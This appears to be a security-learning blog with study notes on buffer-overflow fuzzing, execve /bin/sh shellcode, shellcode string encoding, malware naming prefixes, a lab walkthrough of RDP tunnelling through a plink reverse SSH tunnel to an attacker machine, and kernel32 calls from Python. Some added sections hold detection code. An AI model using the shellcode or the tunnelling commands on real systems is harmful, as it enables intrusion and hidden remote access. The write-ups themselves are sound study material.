import os
# sweep input lengths 500..999, one run of the target per length
for i in range(500, 1000, 1):
    cmd = ("python -c \"print('A' * %d)\"" % i)    # generates the 'A' * i payload
    print("fuzzing length %d" % i)
    os.system("%s | ./vulnapp" % cmd)               # pipe the payload into the target's stdin
notes:
this passes AAAAA... where the length is 500, 501, 502, ... all the way to 1000
and just watches for the input length at which the program seg faults
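The same sweep, as an added example that is not from the original post, with the crash detected programmatically instead of by eye: the target is run through subprocess and its exit status checked for a fatal signal. ./vulnapp is assumed to be the page's target; the runner is passed in as a callable so the sweep logic can be exercised without it.

```python
import signal
import subprocess

# Negative exit statuses on POSIX mean "killed by this signal"; these are the
# signals a memory-corruption crash typically produces.
FATAL_STATUSES = {-getattr(signal, name)
                  for name in ("SIGSEGV", "SIGABRT", "SIGBUS")
                  if hasattr(signal, name)}


def run_target(cmd, payload):
    """Run cmd (a list such as ["./vulnapp"]) with payload on stdin and
    return its exit status. Output is discarded; only the status matters."""
    proc = subprocess.run(cmd, input=payload, stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL, timeout=5)
    return proc.returncode


def crashed(status):
    """True when the status says the process died from a fatal signal."""
    return status in FATAL_STATUSES


def find_crash_length(runner, lengths, filler=b"A"):
    """Feed filler * n (plus newline, like the page's print) for each n in
    lengths. Return (n, status) for the first crashing input, or None when
    no length crashed. runner(payload) -> exit status, so a fake runner can
    stand in for the real binary."""
    for n in lengths:
        status = runner(filler * n + b"\n")
        if crashed(status):
            return n, status
    return None


if __name__ == "__main__":
    # Same range as the page: lengths 500..999 against ./vulnapp (assumed present).
    result = find_crash_length(lambda p: run_target(["./vulnapp"], p),
                               range(500, 1000))
    if result is None:
        print("no crash in the tested range")
    else:
        print("first crash at length %d (exit status %d)" % result)
```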
Wednesday, March 11, 2020
Tuesday, March 10, 2020
shellcode in ASM to C program examples
not optimized for shortness
does not remove null (00) characters
--------
using push
--------
section .text
global _start
_start:
xor rdi, rdi                    ; null qword to terminate the string
push rdi
mov rdi, 0x68732f6e69622f2f     ; "//bin/sh" (little-endian)
push rdi
mov rdi, rsp                    ; filename = pointer to the string on the stack
mov rsi, 0                      ; argv
mov rdx, 0                      ; envp
mov rax, 59                     ; execve syscall
syscall
--------
using data
--------
section .data
sh: db "//bin/sh"
section .text
global _start
_start:
mov rdi, sh                     ; filename = address of the string in .data
mov rsi, 0                      ; argv
mov rdx, 0                      ; envp
mov rax, 59                     ; execve syscall
syscall
------
to compile
------
$> nasm -f elf64 mycode.asm -o mycode.o
$> ld mycode.o -o mycode
$> ./mycode
# whoami
root
Convert String to Shell Code Hex in Python
if you want
//bin/sh
to become hex you can use in assembly for shell code
>>> import re, binascii
>>> for word in re.findall(".{8}", binascii.hexlify("//bin/sh".encode()).decode()):
...     byte = re.findall(".{2}", word)
...     cmd = ""
...     for index in range(len(byte)-1, -1, -1):
...         cmd = cmd + byte[index]
...     print("push 0x%s" % cmd)
...
push 0x69622f2f
push 0x68732f6e
side notes
binascii.hexlify converts the encoded string (bytes) to its hex representation
re.findall(".{8}", ...) splits the hex into 8-character words (4 bytes each)
re.findall(".{2}", ...) splits each word into its 2-character bytes
range(..., ..., -1) loops through the bytes of each word backwards (little-endian byte order)
cmd = cmd + ... rebuilds the hex of each word in the order the push immediate needs
Decode ShellCode String in Python
if you see this
push 0x68732f2f
push 0x6e69622f
it may be a string
you can use python 3 to decode and see
>>> import binascii
>>> binascii.unhexlify("68732f2f").decode()[::-1]
'//sh'
>>> binascii.unhexlify("6e69622f").decode()[::-1]
'/bin'
yep! shellcode
//sh/bin
side note:
binascii.unhexlify was used to convert the hex to bytes
decode() was used to convert the bytes to a string
[::-1] was used to reverse the string's characters (undoing the little-endian byte order)
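As an added example that is not from the original posts, the following Python generalizes both the string-to-push conversion and the decoding of push immediates seen in a disassembly: it emits the pushes in the order they must execute (the word that starts the string is pushed last, so it sits at the lowest address and the string reads forward from the stack pointer), and it decodes a push sequence back to the string the stack would hold, which for the two pushes in the decode post is "/bin//sh". The function names are the example's own.

```python
import binascii
import re
import struct


def string_to_pushes(s, width=4):
    """Split s into little-endian words of `width` bytes and return the push
    instructions in execution order. width=8 yields the single immediate used
    in the mov/push form of the asm post (64-bit push takes no imm64)."""
    if width not in (4, 8):
        raise ValueError("width must be 4 or 8")
    data = s.encode()
    if len(data) % width:
        raise ValueError("string length must be a multiple of the word width")
    fmt = "<I" if width == 4 else "<Q"
    words = [data[i:i + width] for i in range(0, len(data), width)]
    # Reversed: the first word of the string must be pushed last.
    return ["push 0x%0*x" % (width * 2, struct.unpack(fmt, w)[0])
            for w in reversed(words)]


def pushes_to_string(lines):
    """Recover the string a sequence of pushes builds on the stack. Each
    immediate is little-endian, so its bytes are reversed; pushes grow the
    stack downwards, so the words are joined in reverse push order."""
    words = []
    for line in lines:
        m = re.search(r"push\s+0x([0-9a-fA-F]+)", line)
        if not m:
            continue
        hexdigits = m.group(1)
        if len(hexdigits) % 2:
            hexdigits = "0" + hexdigits
        words.append(binascii.unhexlify(hexdigits)[::-1])
    return b"".join(reversed(words)).decode("latin-1")


if __name__ == "__main__":
    for line in string_to_pushes("//bin/sh"):
        print(line)
    # The pair from the decode post, read back as the stack would hold it.
    print(pushes_to_string(["push 0x68732f2f", "push 0x6e69622f"]))
```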
Labels: binascii, decode, Python, reverse string, unhexlify
Monday, February 24, 2020
McAfee Antivirus Malware Virus Type Names Prefixes
from here (McAfee DAT readme, as of 2017):
http://download.nai.com/products/datfiles/4.x/nai/readme.txt
A97M/ Macro virus that infects Microsoft Access 97 files.
APM/ Macro virus or Trojan horse program that infects Ami Pro document and template files.
Bat/ Batch-file virus or Trojan horse program. These viruses usually run as batch or script files that affect a particular program that interprets the script or batch commands they include. They are very portable and can affect nearly any platform that can run batch or script files. The files themselves often have a .bat extension.
CSC/ Corel Script virus or Trojan horse program that infects Corel Draw document files, template files, and scripts.
IRC/ Internet Relay Chat script virus. This virus type can use early versions of the mIRC client software to distribute a virus or payload.
JS/ Script virus or Trojan horse program written in JavaScript language.
JV/ Potentially harmful Java application or applet.
Linux/ Virus or Trojan horse program compiled for Linux operating system in ELF file format.
LWP/ Potentially harmful software for Lotus WordPro.
MacHC/ Virus or Trojan horse program for Apple Macintosh HyperCard scripting language.
MacOS/ Virus or Trojan horse program for Apple Macintosh OS versions 6-9.
MSIL/ Application written using Microsoft Intermediate Language framework, also known as .NET.
P98M/ Macro virus or Trojan horse program that infects Microsoft Project documents and templates.
PalmOS/ Virus or Trojan horse program for a Palm Pilot.
PDF/ File-infector of Adobe PDF files.
Perl/ Script virus or Trojan horse program written in Perl language.
PHP/ Script virus or Trojan horse program written in PHP language.
PP97M/ Macro virus. Infects Microsoft PowerPoint 97 files.
RDN/ Denoting the malware signature was authored by McAfee Automation system.
SunOS/ Potentially harmful software for Sun Solaris.
SWF/ Potentially harmful software for Shockwave.
Unix/ Program or a shell script for a version of UNIX.
V5M/ Macro or script virus, or Trojan horse program that infects Visio VBA (Visual Basic for Applications) macros or scripts.
VBS/ Script virus or Trojan horse program written in Visual Basic Script language.
W16/ File-infector virus that runs in 16-bit Microsoft Windows environments (Windows 3.1x).
W2K/ Potentially harmful software for 32-bit Microsoft Windows environments, specifically Windows NT, 2000, or XP.
W32/ File-infector or boot-sector virus that runs in 32-bit Microsoft Windows environments (Windows 95, Windows 98, or Windows NT).
W95/ File-infector virus that runs in Microsoft Windows 95, Windows 98, and Windows ME environments.
W97M/ Macro virus that infects Microsoft Word 97 files.
WHLP/ Potentially harmful software for 32-bit Microsoft Windows environments that target Windows HLP files.
WM/ Macro virus that infects Microsoft Word 95 files.
X97M/ Macro virus that infects Microsoft Excel 97 files.
XF/ Macro virus that infects Microsoft Excel 95 or 97 via Excel formulas.
XM/ Macro virus that infects Microsoft Excel 95 files.

AdClicker - Repeatedly accesses websites that are funded by advertising.
Adware - Installs advertising software but does not ask permission.
BackDoor - Provides remote access or control through the Internet or network.
Dialer - Dials a phone number without asking for permission.
DDoS - Operates as a Distributed Denial of Service component.
Del - Deletes files.
Downloader - Downloads software from the Internet, usually to deliver backdoors, password stealers, and sometimes viruses.
Exploit - Uses a vulnerability or a software defect.
FDoS - Denotes a Flooding Denial of Service component.
KeyLog - Logs keystrokes for immediate or future transmission to the attacker.
Kit - Denotes a program designed for creating a virus or Trojan horse program.
MultiDropper - Drops several Trojan horse programs or viruses (often several different 'backdoors').
Nuke - Uses defects in software installed on a remote computer to bring it down.
ProcKill - Terminates the processes of anti-virus and security products. May also delete files associated with such applications.
PWS - Steals a password.
Reboot - Reboots the computer.
Reg - Modifies the Registry in an undesirable fashion without asking questions. For example, reduces the security settings or creates abnormal associations or sets.
Spam - Acts as a spamming tool.
Spyware - Monitors browsing habits or other behavior and sends the information out, often for unsolicited advertising.
Uploader - Sends files or other data from the computer.
Vtool - Denotes a program used by virus writers or hackers for developing software.
Zap - Wipes all or part of a hard disk.
Thursday, February 20, 2020
FireEye RDP Tunneling walk-through
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping each other
setup in windows 10 vm
- download plink.exe from putty website
setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)
steps to perform rdp tunneling
1.) on windows victim box
plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389
(note: this sets up an ssh tunnel from your windows victim box to your linux attacker box; kaliLinuxIPAddress is replaced with the IP of your attacker box, and root with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)
2.) then on the kali linux box
rdesktop -u VictimAccount 127.0.0.1:12345
or
xfreerdp /u:VictimAccount 127.0.0.1:12345
or
use remmina for RDP and connect to 127.0.0.1:12345 (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)
(note: now you should be presented with a remote desktop session to the victim box from your attacker box. the interesting thing is that you won't see any rdp traffic, only the already established ssh connection/tunnel on port 22; also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see a source ip of 127.0.0.1 on everything, such as in the remote desktop logs)
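The artifact described in the note above (RDP logons whose source address is 127.0.0.1) is what a defender can hunt for. This added example, not from the original post or the FireEye article, runs that check over constructed sample records laid out with the event-data field names of Windows Security event 4624 (LogonType 10 = RemoteInteractive); the key=value line format is an assumption made so the example runs offline.

```python
import ipaddress

# Constructed sample lines (not a real log export), one 4624/4634 record per
# line, using the event-data field names of Windows Security event 4624.
# Values are assumed to contain no spaces.
SAMPLE_LOG = """\
EventID=4624 LogonType=10 TargetUserName=VictimAccount IpAddress=127.0.0.1 IpPort=49712
EventID=4624 LogonType=10 TargetUserName=helpdesk IpAddress=10.0.0.5 IpPort=51200
EventID=4624 LogonType=2 TargetUserName=win10 IpAddress=- IpPort=-
EventID=4624 LogonType=10 TargetUserName=svc_backup IpAddress=::1 IpPort=49850
EventID=4634 LogonType=10 TargetUserName=VictimAccount IpAddress=127.0.0.1 IpPort=49712
"""


def parse_events(text):
    """Turn each non-empty key=value line into a dict of strings."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(field.split("=", 1) for field in line.split()))
    return events


def is_loopback(ip):
    """True for 127.0.0.0/8, ::1 and IPv4-mapped loopback; '-' or junk is False."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    mapped = getattr(addr, "ipv4_mapped", None)   # ::ffff:127.0.0.1 -> 127.0.0.1
    return (mapped or addr).is_loopback


def find_loopback_rdp_logons(events):
    """Successful RemoteInteractive (LogonType 10) logons whose source address
    is loopback: RDP that arrived through a local tunnel endpoint rather than
    from the network. Legitimate loopback RDP is rare, so each hit deserves a
    look at which process holds the local listener."""
    return [e for e in events
            if e.get("EventID") == "4624"
            and e.get("LogonType") == "10"
            and is_loopback(e.get("IpAddress", ""))]


if __name__ == "__main__":
    for e in find_loopback_rdp_logons(parse_events(SAMPLE_LOG)):
        print("loopback RDP logon: user=%s from %s:%s"
              % (e["TargetUserName"], e["IpAddress"], e["IpPort"]))
```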
Saturday, February 15, 2020
python pefile ctypes kernel32.dll examples
import pefile
import ctypes

# parse kernel32.dll on disk with pefile (path as on the original page)
kfile = pefile.PE(r'Kernel32.dll')

# load the live kernel32.dll through ctypes so its exports can be called
k32 = ctypes.windll.kernel32

# --- *** displays all exports *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
    print(export.name)

# --- *** executes a command like whoami (2nd arg is uCmdShow, 1 = SW_SHOWNORMAL) *** ---
k32.WinExec(b'whoami', 1)

# --- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)

# --- *** prints length of a string *** ---
print(k32.lstrlenA(b'something'))

# --- *** start and stop a timer (milliseconds since boot) *** ---
start = k32.GetTickCount()
end = k32.GetTickCount()
elapsedTime = (end - start) / 1000

# --- *** get process id for the python.exe program running this code *** ---
print(k32.GetCurrentProcessId())

# --- *** get current working directory *** ---
s = ctypes.create_string_buffer(260)        # MAX_PATH; a 50-byte buffer truncates long paths
k32.GetCurrentDirectoryA(len(s), s)
string = s.value.decode()                   # .value stops at the first null byte
print(string)

# --- *** get environment variable APPDATA value *** ---
s = ctypes.create_string_buffer(260)
k32.GetEnvironmentVariableA(b'APPDATA', s, len(s))
string = s.value.decode()
print(string)
Labels: createdirectoryw, ctypes, gettickcount, kernel32, kernel32.dll, pefile, Python, strlen, winexec